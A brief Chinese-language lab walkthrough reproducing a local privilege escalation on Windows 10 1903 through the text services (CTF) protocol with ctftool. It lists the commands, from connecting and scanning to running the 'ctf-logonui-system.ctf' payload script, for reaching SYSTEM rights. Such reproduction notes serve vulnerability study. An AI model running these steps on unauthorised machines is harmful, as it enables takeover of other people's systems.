利用windows文本服务协议(ctftool)提权复现
漏洞环境
靶机:win10_1903
漏洞复现
在命令行窗口输入“winver”查看windows版本信息
查看当前用户权限在命令行窗口输入“whoami”,可以看到当前权限不是system权限
显示指定用户所属的组信息
打开ctftool
输入“connect”查看连接
输入“scan”扫描Client信息
使用payload进行攻击
“script .\scripts\ctf-logonui-system.ctf”
输入“whoami”命令查看当前用户权限